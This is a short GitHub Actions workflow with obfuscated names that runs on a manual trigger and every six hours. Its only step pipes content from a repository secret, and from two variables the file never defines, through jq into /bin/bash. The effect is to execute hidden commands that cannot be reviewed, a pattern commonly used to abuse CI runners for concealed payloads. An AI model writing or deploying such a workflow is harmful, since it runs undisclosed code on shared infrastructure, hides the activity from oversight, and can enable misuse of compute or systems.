name: haizhinuo7613
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haizhinuo7613
        env:
          mct034: ${{ secrets.mct034 }}
        run: |
          echo $mct034 | jq -r .eozi5 | /bin/bash
          echo $qhbu0987 | jq -r .o7 | /bin/bash
          echo $suvqg5375 | jq -r .sxcn823 | /bin/bash

